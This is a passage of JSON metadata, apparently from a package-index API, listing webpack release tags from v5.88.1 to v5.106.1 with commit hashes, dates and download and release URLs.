:"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/